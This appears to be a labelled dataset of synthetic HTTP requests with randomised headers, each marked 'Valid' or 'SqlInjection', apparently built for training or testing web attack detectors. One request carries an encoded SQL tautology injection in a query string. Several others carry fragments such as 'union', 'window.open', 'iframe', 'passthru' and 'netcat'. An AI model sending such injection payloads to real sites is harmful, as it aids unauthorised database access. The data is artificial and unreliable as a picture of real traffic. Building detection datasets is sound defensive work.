If-Unmodified-Since: Tue, 23 Oct 07 03:52:37 GMT
If-Match: "@chbChm6osl3WLCHx13"
If-None-Match: "WSIiJYrFMx2CcPkL"
If-Range: "Xryj7FkMhRr78jwaM"
Max-Forwards: 16
MIME-Version: 3.8
Pragma: ukudehre='hndjh'
Proxy-Authorization: Basic aHB1amJzcHY6bFdhaXQ4dA==
Authorization: Digest response="fBfACBA4DF584E71dDE0c28f1F4ebe2A"
Range: 909287-,-7
Referer: /ilsne7p.wav
TE: trailers
Trailer: If-Match
User-Agent: RhnsinOr1/6.4.5.9
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7851x9196
Via: 1.1 www.ljjdig.jpeg, 9.4 14.218.6.162, 8.8 222.253.254.73
Transfer-Encoding: identity
Upgrade: nag0E/3.8
Warning: 170 219.181.38.135:35 "raamrcnpLht" "Sat, 01 Sep 07 15:23:45 UTC"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: -----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 26929
Start - Id: 26518
class: Valid
GET /no/mbaenTt/bscriptrBu@N4/euCEU2@uOLEr/a@-x/rZX8lwv25/e3S/8gIWimgNUT/BH-O8logsO/o6/l@mBvUbTN.aspx? HTTP/1.0
Host: www.fprpIj.uk:2721
Connection: nsnme3e
Accept: text/*;q=0.4, application/*;q=0.3
Accept-Charset: cp-932;q=0.4, x-mac-greek;q=0.5, windows-1258;q=0.9, cp-936;q=0.4
Accept-Encoding: 
Accept-Language: oawailrh-eahoekla;q=0.1
Cache-Control: no-store
Client-ip: 235.21.77.85
Cookie: lebttl3intaif=0417138;eAmi6tskaElhe=871330;dbael=n47f;Luq@CugOKrV=aRk
Cookie2: $Version="6"
Date: Thu, 24 Dec 09 05:18:32 GMT
ETag: "eY1L8od5@@yXGGQz"
Expect: 100-continue
From: 7vteaPad@uansAaaste.de
If-Modified-Since: Sat, 21 Aug 04 02:13:36 UTC
If-Unmodified-Since: Sat, 31 Oct 09 20:25:00 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.8
Pragma: ewfd=Imcngupu
Proxy-Authorization: NTLM Q3VjOWJjc2RsNWhuc3NvbmJsbnNyeE9meW9vdGV0ZWFiM2M=
Authorization: Digest uri=/jdehai/aosetsoc/hhr3/AA0l.pdf
Range: -51243,13953-
Referer: http://etlc.gov/lahdtle.swf
TE: trailers,chunked,gzip;q=0.7
Trailer: TE
User-Agent: mstQxJHz http://www.Reqiewno.be
UA-CPU: MIPS
UA-Disp: 9620,0046,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: HTTP/9.5 131.244.115.68
Transfer-Encoding: identity
Upgrade: ant/0.2, ebe/2.0
Warning: 836 www.nehybsh.png:6 "sp4oewrMtto" "Tue, 03 Feb 04 12:30:53 UTC"
X-Forwarded-For: 36.115.237.41
X-Serial-Number: 693373977262
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26518
Start - Id: 27756
class: Valid
GET /d3iabn2ei/pOhPq49taeatebo/e-cVU/se9UtmnoPeE/dE1U1b/7Oh/pEgrwntodBoHeubhiO/8YBz/lbdteahq/ibFBi8n/r0ye5netbeuypDx.css? HTTP/1.1
Host: 241.58.30.17:80
Connection: close
Accept: image/*
Accept-Charset: koi8-r;q=0.0, iso-8859-2;q=0.6, windows-874, iso-2022-jp;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=02
Client-ip: 162.238.207.245
Cookie: nextIy=wd
Cookie2: $Version="05"
Date: Sun, 19 Jun 05 03:34:17 CET
ETag: W/"54VBcnNUrMKe9g-K2Aos"
Expect: 7Woa
From: uZwsha@tg2sae.gov
If-Modified-Since: Sun, 23 Sep 07 13:10:18 UTC
If-Unmodified-Since: Thu, 05 Apr 07 01:19:45 UTC
If-Match: "RS2TJrRr9713Om1e"
If-None-Match: *
If-Range: *
Max-Forwards: 54
MIME-Version: 2.1
Pragma: ln=llb
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: 2-,339-73
Referer: /Udcthnh/cb0kkT/tRpnCne/aroO7ehm.jpeg
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.2 (compatible; lsai; Win98; 81aa; nrnY; ebternim)
UA-CPU: x86
UA-Disp: 158,739,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 483x5740
Via: 6.2 www.iwneDer.js, HTTP/9.1 96.3.125.203, 7.9 www.nEedwht.htm
Transfer-Encoding: compress
Upgrade: osynnp/8.4, cny/5.4, axd/4.1
Warning: 677 11.109.58.216 "dsdgrmasohh" "Fri, 19 Jun 09 16:50:58 GMT"
X-Forwarded-For: 222.77.194.240
X-Serial-Number: 256698379
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27756
Start - Id: 11223
class: Valid
GET /irmdtnr4itu/ot/3otzM4j@72KLAT/lzxKtbxSSw/paICjeXvUmrwg.aCHW/Yk-dpn1q/tIQ4zd_A-1fX7QaddSmQ/mloei/xxKlxn0/hlR/f4ax7.cgi?lcinAbsfnae=0977314&houn5totioa=adpassthruw&oee4yTelvbouS=215784716&oeewt71Qsxusach=10&eaTvc=tacceptrcsnsn&cstmnaetuyhe9=44 HTTP/1.0
Host: 251.223.147.238
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-roman;q=0.2, iso-8859-2
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 59.66.86.162
Cookie: wcenytan5=ogsbvswhereeyecHmeo;l2aA=1344270;srtny=271;jrehcwoyiw=9;enhiaseOl=95716;daosrdwpni=aNceodhhhlLhtohoxM
Cookie2: $Version="795"
Date: Mon, 16 Oct 06 05:44:42 GMT
ETag: W/"pKRNQphTAYjN-84"
Expect: Tate=neh0r;anor
From: gHtTgn@sure9wme.de
If-Modified-Since: Mon, 13 Aug 07 12:37:17 UTC
If-Unmodified-Since: Tue, 03 Apr 07 19:14:41 UTC
If-Match: *
If-None-Match: "__LqvmYH1Aw4Cpe"
If-Range: "ZmKyESsz3qqE2JTA55"
Max-Forwards: 46
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic c2VzaEQ6Y2FBdA==
Authorization: NTLM Um5oZG5oM0VodWVBb2xhU2RocGVvbGVjcm9pMWFjYWhFZWU5dHR0YXg=
Range: -62895,1183-7810
Referer: /SiRhcm/nuln.rar
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 5.0; cq-n6; rv:8.1.0) Gecko/58237272
UA-CPU: 68000
UA-Disp: 7122,239,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 689x7201
Via: dosie/4.1 www.iebrrOi.css, 8.2 153.37.12.103
Transfer-Encoding: s9nd
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 196.44.53.29
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11223
Start - Id: 41751
class: SqlInjection
GET /w3Ev/zcbiaebnrgsstolr4w/npY/ce/eodIcorietii6/ta/EhlM/ssf/vrds/ttpes/raibNdrpo8erf.gif?gIeaara3=a0%28%25&8taaeeliirg=u%25u&EeEmtarrnktiq3=OR+++++%27ju%27+++++%3D++++%27++++%27&mnbznIreetetaE=n%2Bvar+telnetlogtc2rmla&h2EtehsIqhh=977&1ueodegonHtnlf=73&O3Slcxhehltay=hkvsm&drwnteixerm=00854165&yzjf=dIv09V&ratgrMpaGPiouo=xd2&gotw78tson=Er%2B0%3Aymaiframe&0PvG=1&eaepEtoz=0&hea=ad9EpositionedTt HTTP/1.0
Host: www.eeliqalopi.org
Connection: tiam
Accept: video/*, application/rtf
Accept-Charset: x-mac-chinesetrad, x-mac-cyrillic;q=0.0, shift_jis;q=0.7
Accept-Encoding: compress
Accept-Language: th-lsBlrn;q=0.5
Cache-Control: no-transform
Client-ip: 122.67.58.101
Cookie: Angr62iado=tta;i4heotit7Eaua=244287;7riilaah=ybdenii 8uost;eaon=eQsv7rJ3is;cer1u4oemearals=t8l
Cookie2: $Version="381"
Date: Sun, 11 Apr 10 06:23:15 CET
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: crar=tsunz
From: lehFo@eioiwni.cz
If-Modified-Since: Sun, 27 Jan 08 13:17:56 UTC
If-Unmodified-Since: Mon, 04 Jan 10 18:15:48 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic cGI2bXI6c2l0eHNubVM=
Authorization: 2nSde2 mi07s=3lgR
Range: -69404,-1
Referer: /Epue2/swran0/tmNeutil/8teyyeeS/ziwayl.jpeg
TE: trailers,gzip;q=0.1
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 4.6; oZ-nr; rv:7.8.3) Gecko/32194936
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8272x964
Via: adhdw/2.9 www.dbak6.png, 2.7 122.247.120.158:732, 5.4 www.dy2a.html
Transfer-Encoding: deflate
Upgrade: nrm/7.6, ee0ei/0.3
Warning: 607 www.YSrrvdrE.js "aoDrnimr" "Wed, 02 Nov 05 02:56:53 UTC"
X-Forwarded-For: 85.136.145.231
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41751
Start - Id: 22410
class: Valid
GET /ta28X4hncisNlaute/srSAh6JWKO/pAB_/ttaoone2ldasenao/QUnodeBkT/VnacceptPbinQhJW8Sexec/rkhttpszT.qdYXXC/7IM7zs8TE4ecDPmmrlnz/msvGwa8a@6F@hx542/inVXLpassthrus7N/a0T44ps8qgu7lunEehg3.cgi?IrthieyDute4e=0tD&eneRteOsnIztdZq=%27uniong&tbfaoeJ=r4&xt=input&nVovw0aoe=69681&areeiitno6b=4rB9M5I6Gm&hoz3o=tXAyYD6jOB HTTP/1.1
Host: www.imfuh.org:80
Connection: gh6toi
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=733
Client-ip: 102.187.24.158
Cookie: oearaen=12242;clohXr2oat=880254
Cookie2: $Version="7"
Date: Fri, 10 Jul 09 20:56:40 UTC
ETag: "i8DWFxnOiHIA0GwWJQXT"
Expect: 100-continue
From: osurT@isn3pers.uk
If-Modified-Since: Thu, 09 Feb 06 15:29:36 UTC
If-Unmodified-Since: Sun, 02 May 10 08:13:19 CET
If-Match: *
If-None-Match: "SlYxF6Yfz2yoVDw7"
If-Range: *
Max-Forwards: 0557
MIME-Version: 8.5
Pragma: i58wrene=r
Proxy-Authorization: NTLM c3NlOG5yZU50bWVIeWxuaWx4NWlldWFvaTFxZW5sYjZhVHI=
Authorization: Digest nonce
Range: 6241-,-19542
Referer: /sifheeei/odxou/ue2fo.asmx
TE: gzip
Trailer: Date
User-Agent: Mozilla/2.8 (X11; U; Open BSD i386 3.9; pl-ds; rv:7.5.6) Gecko/51355008
UA-CPU: x86
UA-Disp: 1777,9655,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 112x1566
Via: 3.8 209.19.229.109, 0.4 www.orquei25.shtml
Transfer-Encoding: semre; rrroxoc=sofhed3s
Upgrade: ioit8a/2.3, ldiu/6.1, uEu/1.0, AH6/0.7
Warning: 949 77.186.186.16 "Iorhnid7st02Rm" 
X-Forwarded-For: 112.96.205.75
X-Serial-Number: 935727491848892765
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22410
Start - Id: 22440
class: Valid
GET /g-8h/mYh7/h7yaNQ/stofehvimizi6ho/2m2vnAptmpS8/optnSallmD/tdsrao0/xlMLH_iYDusrOFr6X/kefdlnvkg/nmAN.png?sxewsuegnseht=tlln HTTP/1.1
Host: 232.90.18.125
Connection: keep-alive
Accept: application/postscript;q=0.8
Accept-Charset: x-mac-greek, iso-8859-5, iso-8859-1, shift_jis;q=0.8, euc-jp;q=0.1
Accept-Encoding: compress;q=0.2, identity;q=0.3, identity, compress, compress
Accept-Language: 3tihb-iNeihT;q=0.3, elnHnur-vahnbww;q=0.2, iFha-a3t6, cjrvdbm-hslttne;q=0.0, 0geect8-dtbddta
Cache-Control: no-cache
Client-ip: 242.133.189.214
Cookie: h9NdsQ=hisdeiasopen;twAere=0491654495
Cookie2: $Version="35"
Date: Sat, 20 Feb 10 11:57:26 GMT
ETag: "xa-zMNeKb3jW4Lg6"
Expect: tieseA
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Sun, 07 Mar 04 02:54:31 CET
If-Unmodified-Since: Wed, 04 Apr 07 11:50:14 CET
If-Match: *
If-None-Match: "qxDDYcMhDgYooKwM"
If-Range: Thu, 13 May 04 23:10:38 GMT
Max-Forwards: 0445
MIME-Version: 6.3
Pragma: nnccdyht=coeheoto
Proxy-Authorization: Basic TzNkcjpsODF0VG8=
Authorization: Basic TmlqRWN4cjplYkVuZXpkYg==
Range: 6444-70796,874-
Referer: http://piddy3un.gov/Tslg3Uu/iAtn/hhte3wbS.dll
TE: chunked;q=0.7
Trailer: Authorization
User-Agent: mosUepa4tejtK
UA-CPU: x86
UA-Disp: 8455,3550,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/5.6 242.4.20.62, 65hnS/6.0 244.190.77.92, HTTP/1.0 137.54.137.29
Transfer-Encoding: e9men; fguaelu=mh3i
Upgrade: plrEu/0.9, 0onans/5.6, irA/4.2
Warning: 775 242.150.48.252:01439 "edbeecvdNatlhToaah" "Thu, 14 Jul 05 23:57:30 CET"
X-Forwarded-For: 14.86.146.83
X-Serial-Number: 5826747890581
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 22440
Start - Id: 6711
class: Valid
PUT /aJTLa.LJveLyr7M/httpjppsE8bodyYD.ked8/o3cneh/e9ave5srtezm/qbgwYAM5PXieT0jg/ct/5Oq0k1@U-8libArKr/aOaczg/tlde9/sbdeyoi2aa/CkL/7e8roYj.htm? HTTP/1.0
Content-Length: 272
Content-Language: ra,c5rzprod,p
Content-Encoding: compress
Content-Location: http://www.wfag.be/aooTi/r0rh25t/ologreMB/i3inE.mdb
Content-MD5: dGRlVGN1ZXRhc3U1a2FhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jul 08 14:43:33 GMT
Last-Modified: Wed, 28 Dec 05 22:37:44 UTC
Host: www.EiTt.ch:84822
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: vedusa-eym, atzthDSa-ew;q=0.0, g-teu, y-Ppoe;q=0.7, ceol-lr1a
Cache-Control: no-cache
Client-ip: 97.171.127.107
Cookie: ssHNeeJoti=985704;n8hg1sbr1qjita=fiomelUnofetc
Cookie2: $Version="8"
Date: Mon, 28 Sep 09 18:42:46 UTC
ETag: "aG1vrSNm98Vz.yO"
Expect: ad1hnn
From: mclrnIty@tsleicrn.gov
If-Modified-Since: Wed, 21 Mar 07 13:05:34 GMT
If-Unmodified-Since: Sat, 27 Nov 04 06:49:09 UTC
If-Match: "NQwgx1JxrOpK_GF5"
If-None-Match: "3m3oVqweg81UvfYy"
If-Range: *
Max-Forwards: 818
MIME-Version: 7.3
Pragma: ub='huPI'
Proxy-Authorization: dsaeS r0s5=eu7h
Authorization: Basic b3J0MUJjOnpsZkZ1VGs=
Range: -06,1117-,939411-320
Referer: http://iroI.gov/psLimtt/E1au/rAoon/irssdce/o7plho.pdf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/9.6 (Windows; U; Win98 0.9; pa-tA; rv:7.9.7) Gecko/40631507
UA-CPU: Sparc
UA-Disp: 035,576,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1839x456
Via: 6.1 183.153.60.247, 0.2 227.201.49.224
Transfer-Encoding: compress
Upgrade: hrutt/6.0, tbuzs/0.5, iar/0.3, u7e4ae/3.3
Warning: 182 www.soIvoae.css "imgoyeeiesse1n" "Sat, 19 Jan 08 03:06:04 CET"
X-Forwarded-For: 6.218.56.206
X-Serial-Number: 688311326706532
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rjs0eaumo=>e7t5M&6d=e&ehfeDdnm=4196&lEupw=952749&347opreei6Hsepu=mBuhWQqeWHD&3eyiicohp=fv4+ &6hdd=32&eelximag=d6t1gwjO.&rjE50icS=e5df'pallSEeehxbBr&nza72hame=(srsamstnfromIyoetco~0dexeca&yozih=910&eqKo=aselecth/h@r e&nanPBtc1i5mrtui=t3eem&tEa6taewo=wotM7dpNk

End - Id: 6711
Start - Id: 16672
class: Valid
GET /r2eSs/v2We1E.mspx? HTTP/1.1
Host: 62.204.40.146:80
Connection: keep-alive
Accept: text/*, video/quicktime;q=0.1, text/html
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.0, identity;q=0.7, deflate;q=0.4, compress;q=0.5, identity;q=0.0
Accept-Language: *
Cache-Control: max-age=4804
Client-ip: 49.119.203.133
Cookie: He3qtimT=bwYUwsT
Cookie2: $Version="8"
Date: Mon, 14 Aug 06 22:45:48 GMT
ETag: W/"iSyHmqE12WxNZl-P"
Expect: 100-continue
From: tjucAt@b0hi.gov
If-Modified-Since: Sat, 17 Jan 09 09:57:26 CET
If-Unmodified-Since: Tue, 10 Aug 04 21:57:08 CET
If-Match: "CQ1G4ZX_vi15sRj"
If-None-Match: ".ZH33J9ygun2VA5_"
If-Range: *
Max-Forwards: 0021
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic ZXVUV3A6c29iYXJyZU8=
Authorization: NTLM YnRodGxlTW95QWxvZVNsd2V0b3MxZmFFYW9jZW5JdGF0c3llbjFzc3R3b2lo
Range: -9453,5-40420,64432-847429
Referer: http://www.erst.it/hUzl/oeenrzE/ahuai/6tdr.php
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/7.5 (compatible; Konqueror/6.8; Linux i386; oeoPe; 4ayht)
UA-CPU: x86
UA-Disp: 0786,0517,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6609x7402
Via: HTTP/4.7 www.ti4snf7.jpg, 9.3 88.106.235.171
Transfer-Encoding: gzip
Upgrade: bt5iw/9.8, eelOhb/1.7, sstab/7.9, e3e/5.2, ifooo/5.5
Warning: 890 www.nUiou.jpeg "oe52aLer" 
X-Forwarded-For: 241.107.33.0
X-Serial-Number: 6490283013114622
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16672
Start - Id: 10472
class: Valid
GET /LPsgFUjy9tmp/e8PnZhFqxZd7r.M/t5L8Sp/reetetsutz.shtml?dsR31=iie&IG9q=sakE&oEii0zX=ew1ni&seAnaieWti4Wi=rvbscript&.qtChc=6181932&matn=t1JBfB1dPpdi HTTP/1.1
Host: www.7nfe.de
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, iso-8859-8;q=0.6, iso-8859-6
Accept-Encoding: *
Accept-Language: s-2qtt, 0d-i;q=0.7, muc-o
Cache-Control: ndtamt=ieiu
Client-ip: 234.79.172.175
Cookie: zkwennLnsz6emeu=074543
Cookie2: $Version="93"
Date: Fri, 22 Dec 06 17:07:52 GMT
ETag: "l4MqmcenoI2jHZrUVD9s"
Expect: 100-continue
From: cnaRah@eehb.be
If-Modified-Since: Wed, 19 Dec 07 11:48:05 CET
If-Unmodified-Since: Wed, 09 Apr 08 10:21:09 GMT
If-Match: *
If-None-Match: "PZme4TJzmkevuBpExfb"
If-Range: *
Max-Forwards: 8962
MIME-Version: 2.6
Pragma: ps='1iiEf'
Proxy-Authorization: NTLM c0lwRGFJb2x0bTNkdGVlRXJleTFwc2Zoc2VzbXZuN3IyeHRubA==
Authorization: NTLM c3QyUmVpYXNpaGVGanNzZDhyOGVBaWZpZUVodGUyeW5hY0F0b2VycmxJc3Rwb2U=
Range: 5-1,96994-671,51284-
Referer: http://www.nA8nw8cv.it/ehareoa/t5tza/udoneeeL/dx8rvta.mspx
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: Mozilla/7.2 (Windows; U; Win98 6.8; il-47; rv:4.6.1) Gecko/17547439
UA-CPU: StrongARM
UA-Disp: 4955,848,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 747x1672
Via: 8.1 www.7nmcvXph.png
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 236 www.oadmow.htm "dwuNt7" "Fri, 01 May 09 20:56:35 UTC"
X-Forwarded-For: 153.53.63.108
X-Serial-Number: 23963701086419023023
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10472
Start - Id: 25055
class: Valid
GET /av/n2ehetgesjsonT/9ehe0dr/4.M_gfPjVzYiu10UM.mspx? HTTP/1.1
Host: 16.111.167.254
Connection: shueO
Accept: */*;q=0.1
Accept-Charset: x-mac-hebrew
Accept-Encoding: identity;q=0.6, compress;q=0.1, gzip;q=0.6, gzip, gzip;q=0.4
Accept-Language: nnmodxeo-6gaiR
Cache-Control: min-fresh=0
Client-ip: 62.204.47.211
Cookie: oweff=Teigopeni;6msfwh5nnesiueu=1820;taEo=p8tnoaoecicfestaey;teYhiunopoijc=NeIlo2t;8aTue=sltta;mTrze=15463720
Cookie2: $Version="3"
Date: Tue, 11 Jan 05 16:47:11 GMT
ETag: W/"4Za38LYvU1h@026ySz"
Expect: 100-continue
From: Nett@Mbgoe.fr
If-Modified-Since: Thu, 25 Jun 09 18:48:19 GMT
If-Unmodified-Since: Thu, 27 Mar 08 20:46:49 GMT
If-Match: "pY5YokBSp3BqpDm.habJ"
If-None-Match: "AUNbvOfWk4Y1h4d@oZ"
If-Range: *
Max-Forwards: 5786
MIME-Version: 0.1
Pragma: rhnle=hitthnbc
Proxy-Authorization: NTLM b3NqaXEydG9qaW13bGVlaWU2cWhpbWlyZGlMaTZ0Z2F0dw==
Authorization: 0psH u6alrd=yaeier
Range: 978-9166
Referer: http://www.taautj.org/lhHtp/ruhlol3d/naAOks/oagh.gif
TE: deflate;q=0.2,trailers
Trailer: If-Unmodified-Since
User-Agent: eHx2/3.9
UA-CPU: x86
UA-Disp: 0739,480,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 6866x078
Via: 3.9 17.148.55.42, FTP/1.6 4.138.212.237, ohte/8.6 96.3.134.176
Transfer-Encoding: eslon
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 154 www.tw6sot.shtml "4eodetrlyah" "Tue, 21 Mar 06 01:21:00 CET"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25055
Start - Id: 27260
class: Valid
GET /r8bN2vVO.pl?tvpcrraicgG1=bulelofs&tekanp=Te%3Eer HTTP/1.0
Host: www.nof4251.gov
Connection: 6Kenc
Accept: text/*;q=0.0, video/*, video/mpeg
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.3, gzip;q=0.4
Accept-Language: sseosbd-h4wes1;q=0.1, nqghN-eh, m-rfwoqo;q=0.1, hoc9bah5-4er;q=0.4, tzyeaxET-afz;q=0.7
Cache-Control: max-stale
Client-ip: 2.248.6.208
Cookie: ncbKLuiMservices=aGD;Izxarnnoa6n6uet=Euj;ay6n=g$9B;bog=Sh$gtu<>u0ewhere;eessamCr(
Cookie2: $Version="72"
Date: Fri, 31 Jul 09 14:30:32 UTC
ETag: "8IO4aHj9YOnZfIqJon"
Expect: 100-continue
From: qeobeh@lLaajziNt.com
If-Modified-Since: Thu, 09 Sep 04 21:36:07 CET
If-Unmodified-Since: Mon, 11 Feb 08 15:46:03 GMT
If-Match: "6vfcp8dKybV0yzWi21"
If-None-Match: "cehF7LF9nh@Z9wOAAGQ"
If-Range: "QosPG3LxgjV_8Z1qr"
Max-Forwards: 59
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.yonersA.it/viliere/nase/ataasc/2ehf/a6te.js
Authorization: 6aen rmrhtlTa=aaouei
Range: -7
Referer: /e4Aym0.pl
TE: deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (compatible; MSIE 6.5; Windows NT; obooieht; tNah)
UA-CPU: 68000
UA-Disp: 4043,642,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8847x8709
Via: 6.5 www.rofndEr.js, n7a/0.1 www.5vl2s.html
Transfer-Encoding: HdV5a; saarct5=h5enst
Upgrade: abeo/1.7, hNice/0.8, onao/1.2, i1n/2.5, rho/8.7
Warning: 401 www.sbfs.jpeg "cs4fiar" "Thu, 05 Jul 07 13:41:31 GMT"
X-Forwarded-For: 59.58.186.111
X-Serial-Number: 03585265611938930040
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 27260
Start - Id: 11065
class: Valid
GET /dvTIw@/oy/cL/spw/eirawe6t3tlae/Nriem/jmftii7/iNKF.CeL2/cyw/SoThett/tsWaNRwIuDgmK_yw/kEYd1mh96m7VvwLQP.jsp?u3nra2t=moz&t4ysWaATCx=nlmune&mgsna7ea8ot5e=4842&orso=Inb%29window.openha3damt&trk2ieiws=tteb%3EooDr9tdf&oiarjhil=eraft&RteE42fsebpeusm=hB7&hXfhtpass=z%3Ehlct%5D%2Fx&oftataM4=%5Dh&yleyWbzHI=erar&gg3uraarsl0=0000906&oerAshjp8=oa&mrleTsoasubF=g%3Bonnona HTTP/1.1
Host: 48.128.51.57
Connection: close
Accept: */*
Accept-Charset: iso-8859-2;q=0.7, isiri-3342, windows-1258;q=0.2, windows-874
Accept-Encoding: identity
Accept-Language: Sk-iaHi40a
Cache-Control: min-fresh=88434
Client-ip: 224.189.199.226
Cookie: 3oN8s4t16=7;WR4Y=o|0;tsDdi7oebin=omait
Cookie2: $Version="042"
Date: Thu, 29 Nov 07 06:55:40 CET
ETag: W/"b8fDy4loGf84r_hTeImC"
Expect: 2Ezh
From: e9esarYc@ncTsfi.org
If-Modified-Since: Sat, 24 Oct 09 16:40:06 CET
If-Unmodified-Since: Wed, 17 Feb 10 18:50:26 GMT
If-Match: *
If-None-Match: *
If-Range: "_R0zJgU1ZQziPdB5X"
Max-Forwards: 6561
MIME-Version: 4.7
Pragma: aCrqgme='ec7l'
Proxy-Authorization: Basic b2VsYmg6Z2RicnRu
Authorization: Digest opaque="eotaHjne"
Range: -26420,731526-452811,442365-468
Referer: http://www.6hemwS0k.uk/9at5m8ka.asp
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/3.8 (X11; U; Linux i586 8.0; r5-4o; rv:3.9.0) Gecko/37412061
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1068x1035
Via: HTTP/1.8 100.249.120.28
Transfer-Encoding: identity
Upgrade: nmyio/6.6
Warning: 864 42.215.124.198 "smicegomrl2AdEeez" 
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 4007248
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11065
Start - Id: 13635
class: Valid
GET /r8U.ZNmQ2_eQOPLK/tTe0ito.js?9eolbYtzhefk=2orls5nh&ttRrgcfpc9hazia=ma%26enegm&smi2asamtNdnae=720&Bntht=isldoqishU&4be1zmGh=dreaccess_logsjt%2B2iw&rlan4nsrusa4iet=iao&znsbCrennohtr=3&sVewjq1zsRyued=4341471&rNyo=7787303&HDnetcat1V=ieyHoe6lReI HTTP/1.0
Host: 233.218.228.43:4551
Connection: close
Accept: video/quicktime;q=0.4
Accept-Charset: windows-1257, windows-874;q=0.8, x-mac-japanese, windows-1257
Accept-Encoding: 
Accept-Language: 7Vawn-fe65t, l-iety, omE-4iIiis, twwgy-EpHpxinw;q=0.3
Cache-Control: no-store
Client-ip: 63.99.161.90
Cookie: seaaa=rDunion;aeC=57;CpF6C=dE;XB_-Minsertzwindow.open1T=odn;urgoik=3e copy;yposition8y=nDkkx8cSg
Cookie2: $Version="8"
Date: Fri, 03 Aug 07 23:30:56 GMT
ETag: W/".svz6RRUCDdmYCp_"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Sun, 22 Jun 08 15:39:46 GMT
If-Unmodified-Since: Thu, 19 Jul 07 06:29:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 166
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: evYe vtutcenr=svCN1T
Authorization: Digest uri=/s9teva/oete.nsf
Range: 61-
Referer: http://42EmAe.net/rkaeDnzt/yoSdi/tdoh/dam1/Qndd1Emb.cfm
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.8 (compatible; dsw3; Linux i386; cihoNn; irgsoaiwe; anSlt)
UA-CPU: StrongARM
UA-Disp: 0811,7383,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1926x6601
Via: FTP/8.0 95.71.177.228:2250, HTTP/9.9 www.teiwp1gR.js, 1.1 168.139.14.46
